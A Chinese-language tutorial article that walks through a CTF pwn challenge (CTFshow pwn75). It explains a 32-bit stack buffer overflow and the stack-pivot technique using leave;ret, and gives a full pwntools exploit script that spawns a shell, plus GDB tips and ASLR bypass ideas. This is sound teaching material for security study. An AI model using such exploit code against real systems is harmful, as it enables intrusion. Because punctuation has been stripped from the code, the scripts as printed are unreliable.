ARTICLE DETAIL

资讯详情

深耕网站视觉设计与运营推广的一线实战洞察。

栈溢出漏洞与栈迁移技术实战解析

栈溢出漏洞与栈迁移技术实战解析 1. 栈溢出漏洞基础与实战场景栈溢出Stack Overflow是二进制安全领域最经典的漏洞类型之一也是CTF竞赛中PWN题目的常见考点。当程序向栈上的缓冲区写入超过其预定容量的数据时就会覆盖相邻的内存区域包括函数返回地址、保存的基址指针等关键数据。攻击者通过精心构造的输入数据可以劫持程序控制流实现任意代码执行。在x86架构下函数调用时会依次将参数、返回地址、保存的ebp寄存器值压栈随后为局部变量分配空间。典型的栈结构如下高地址到低地址参数N ... 参数1 返回地址 保存的ebp 局部变量当使用不安全的函数如gets、strcpy等向局部变量缓冲区写入超长数据时从低地址向高地址的填充会依次覆盖保存的ebp和返回地址。通过精确控制溢出内容我们可以覆盖返回地址直接跳转到目标函数如system(/bin/sh)覆盖保存的ebp配合leave;ret指令实现栈迁移Stack Pivot在栈上布置ROP链绕过防护机制实现复杂利用2. pwn75题目分析与漏洞定位以CTFshow平台上的pwn75题目为例我们首先进行基础分析$ checksec pwn75 [*] /tmp/pwn75 Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)关键防护情况32位程序小端序未启用栈保护Canary启用NX栈不可执行未启用地址随机化PIE使用IDA Pro反编译后发现主要漏洞函数void vulnerable_function() { char buf[64]; // 64字节缓冲区 read(0, buf, 256); // 允许读取256字节明显溢出 }通过计算可知从buf到返回地址的偏移量为buf到保存的ebp64字节缓冲区 4字节保存的ebp 68字节再到返回地址再加4字节 72字节3. 栈迁移技术原理详解当面临以下情况时传统栈溢出技术可能失效溢出空间不足无法放下完整的ROP链目标环境限制如栈空间太小需要多次利用漏洞如信息泄露最终利用栈迁移Stack Pivot的核心思想是通过修改ebp的值将栈迁移到攻击者控制的其他内存区域如.bss段、堆空间等。关键技术点leave指令的作用mov esp, ebppop ebpret指令的作用pop eip典型利用步骤覆盖保存的ebp指向目标迁移地址-4因为leave会pop ebp覆盖返回地址为leave;ret指令地址在迁移地址布置新的栈帧和ROP链4. pwn75栈迁移实战步骤4.1 信息收集与准备首先确定关键地址from pwn import * elf ELF(./pwn75) leave_ret 0x08048418 # 通过ROPgadget查找 bss 0x0804a000 0x500 # 选择.bss段后方空间构造迁移目标布局高地址 ... fake_ebp2 system_addr binsh_addr # /bin/sh字符串地址 低地址4.2 分阶段payload构造第一阶段触发栈迁移payload1 flat( bA*64, # 填充缓冲区 bss-4, # 新的ebp值迁移目标-4 leave_ret, # 返回地址 )第二阶段在迁移地址布置ROProp ROP(elf) rop.system(next(elf.search(b/bin/sh\x00))) payload2 flat( bss8, # 新的ebp值随意合法地址 rop.chain() )4.3 完整利用脚本#!/usr/bin/env python3 from pwn import * context(archi386, oslinux, log_leveldebug) p process(./pwn75) leave_ret 0x08048418 bss 0x0804a000 0x500 # 第一阶段触发栈迁移 payload1 flat( bA*64, bss-4, leave_ret ) p.sendafter(binput:, payload1) # 第二阶段布置ROP链 rop ROP(elf) rop.system(next(elf.search(b/bin/sh\x00))) payload2 flat( bss8, rop.chain() ) p.send(payload2) p.interactive()5. 调试技巧与常见问题5.1 GDB调试关键点在leave指令处设断点b *0x08048418观察栈迁移前后寄存器变化telescope $esp 20 info registers检查迁移后栈布局x/20wx 0x0804a5005.2 典型错误排查段错误SIGSEGV检查迁移地址是否可写使用vmmap命令确认payload对齐32位下4字节对齐控制流未按预期执行检查leave_ret地址是否正确验证ROP链构造是否合理使用ROPgadget工具输入处理异常注意read/gets等函数对截断字符的处理使用raw输入避免转义问题6. 防护绕过与高级技巧6.1 对抗ASLR当存在信息泄露漏洞时可以泄露libc地址计算基址泄露栈地址确定迁移目标使用partial write绕过地址随机化6.2 小空间利用当溢出空间极小时分阶段迁移多次leave;ret使用one_gadget替代完整ROP链结合堆漏洞扩大利用面6.3 其他迁移目标选择除了.bss段还可考虑堆空间若可控环境变量区域ld.so的保留内存区关键提示实际比赛中栈迁移常与信息泄露结合使用。建议先通过格式化字符串或堆漏洞泄露关键地址再精心设计迁移目标布局。
返回列表